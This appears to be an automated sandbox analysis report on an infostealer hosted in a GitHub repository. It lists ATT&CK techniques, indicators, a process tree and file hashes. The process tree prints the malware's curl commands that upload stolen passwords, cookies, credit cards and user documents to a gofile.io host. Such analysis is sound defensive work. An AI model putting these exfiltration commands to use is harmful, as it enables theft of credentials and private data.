hxxps://github[.]com/FluxusV2/bestdupev2

Analysis

max time kernel
117s
max time network
114s
platform
windows10-2004_x64
resource
win10v2004-20241007-de
resource tags

arch:x64arch:x86image:win10v2004-20241007-delocale:de-deos:windows10-2004-x64systemwindows
submitted
10-10-2024 17:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/FluxusV2/bestdupev2

Score

8^/10

credential_access discovery pyinstaller spyware stealer

Malware Config

Signatures

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bestdupev2.exe	bestdupev2.exe

Executes dropped EXE 2 IoCs

pid	Process
980	bestdupev2.exe
436	bestdupev2.exe

Loads dropped DLL 41 IoCs

pid	Process
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe
436	bestdupev2.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
53	raw.githubusercontent.com
54	raw.githubusercontent.com
93	discord.com
95	discord.com
114	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
81	api.ipify.org
80	api.ipify.org

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0008000000023d4c-230.dat	pyinstaller

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133730559881872858"	chrome.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
2092	chrome.exe
2092	chrome.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
2092	chrome.exe
2092	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe
Token: SeShutdownPrivilege	2092	chrome.exe
Token: SeCreatePagefilePrivilege	2092	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe

Suspicious use of SendNotifyMessage 62 IoCs

pid	Process
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
2092	chrome.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe
4060	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2092 wrote to memory of 4536	2092	chrome.exe	84
PID 2092 wrote to memory of 4536	2092	chrome.exe	84
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 3684	2092	chrome.exe	85
PID 2092 wrote to memory of 4016	2092	chrome.exe	86
PID 2092 wrote to memory of 4016	2092	chrome.exe	86
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87
PID 2092 wrote to memory of 1504	2092	chrome.exe	87

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/FluxusV2/bestdupev2
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc51adcc40,0x7ffc51adcc4c,0x7ffc51adcc58
  2⤵
  PID:4536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1896 /prefetch:2
  2⤵
  PID:3684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2144,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2192 /prefetch:3
  2⤵
  PID:4016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2360 /prefetch:8
  2⤵
  PID:1504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
  2⤵
  PID:2536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4420,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:8
  2⤵
  PID:4592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5140,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5144 /prefetch:8
  2⤵
  PID:1440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5156,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5204 /prefetch:8
  2⤵
  PID:1296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5164,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5468 /prefetch:8
  2⤵
  PID:1804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5136,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5616 /prefetch:8
  2⤵
  PID:4172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5212,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5496 /prefetch:8
  2⤵
  PID:900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4692,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4504 /prefetch:8
  2⤵
  PID:3136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4608,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4580 /prefetch:8
  2⤵
  PID:1456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5764,i,3130937835288237357,7985948290066977787,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5832 /prefetch:8
  2⤵
  PID:2244

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4676

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
PID:4872

C:\Users\Admin\Downloads\bestdupev2.exe
"C:\Users\Admin\Downloads\bestdupev2.exe"
1⤵
- Executes dropped EXE
PID:980
- C:\Users\Admin\Downloads\bestdupev2.exe
  "C:\Users\Admin\Downloads\bestdupev2.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store5.gofile.io/uploadFile"
    3⤵
    PID:2396
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store5.gofile.io/uploadFile
      4⤵
      PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store5.gofile.io/uploadFile"
    3⤵
    PID:3688
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store5.gofile.io/uploadFile
      4⤵
      PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store5.gofile.io/uploadFile"
    3⤵
    PID:856
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store5.gofile.io/uploadFile
      4⤵
      PID:3820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store5.gofile.io/uploadFile"
    3⤵
    PID:2152
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store5.gofile.io/uploadFile
      4⤵
      PID:3536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store5.gofile.io/uploadFile"
    3⤵
    PID:2496
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store5.gofile.io/uploadFile
      4⤵
      PID:4384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store5.gofile.io/uploadFile"
    3⤵
    PID:1720
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store5.gofile.io/uploadFile
      4⤵
      PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupInvoke.ppsx" https://store5.gofile.io/uploadFile"
    3⤵
    PID:3504
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/BackupInvoke.ppsx" https://store5.gofile.io/uploadFile
      4⤵
      PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/CompleteBackup.dot" https://store5.gofile.io/uploadFile"
    3⤵
    PID:3684
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/CompleteBackup.dot" https://store5.gofile.io/uploadFile
      4⤵
      PID:2428

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4060

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
2KB

MD5
3968e83b4534d16593652cd48c1236b9

SHA1
4538543b03a129a7a17bc69f7e282d0106e7bc7b

SHA256
2c6aa8c0d6ff79ae13a24be60f0e5ce1de42857d0f16fe0739616afae9f62b2a

SHA512
5686ba2bf63c8c5e69e647f1d5a7b263c2ad5ea784e315538f0786c8ed76b0092acfe3c2375a6d701448a2dffe6d1c339205823a747ef75c969bdd7c7784bee3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
c8de82df4a694ab6a607aa894a0e23c6

SHA1
f637fe66462153e86bcadc352585847c0028d374

SHA256
e9c933c4cecfdeab74741d77f54fa6ef7d27f295e4023f408d5683545219db75

SHA512
cd5636766911fbb8b1f0765d9fc53bd4bee413ae2b77712d79966041e27fab3ce8498ca05e45a18c01990557b35fac976d2aa43449caff5a821b0f157edf3031

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
f2dc4b70861c34564338b1551275f383

SHA1
d396cfa66fe634075c37c5061e8519eab4de51f7

SHA256
c9d114c846b1a752882253bbb66ffaacb2fd42a0c892f94045a9496bf51be636

SHA512
7f8c53100bfc6f2dab75ee9661e243a4709197883b5dce3c5778d990c878e9d7beed581fb41de592d1803a3cd5efe620c5df3e05164babcf3eb5efb4729b5034

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
7ac83f53f0c9206fe0a071fd0dfd83e1

SHA1
3068e4bb5722546855245643ca6ec436f684c9da

SHA256
97d56bd6bfd49201eea54d42418857c2a7c270f3915a6957ae3fba9eaf78ac37

SHA512
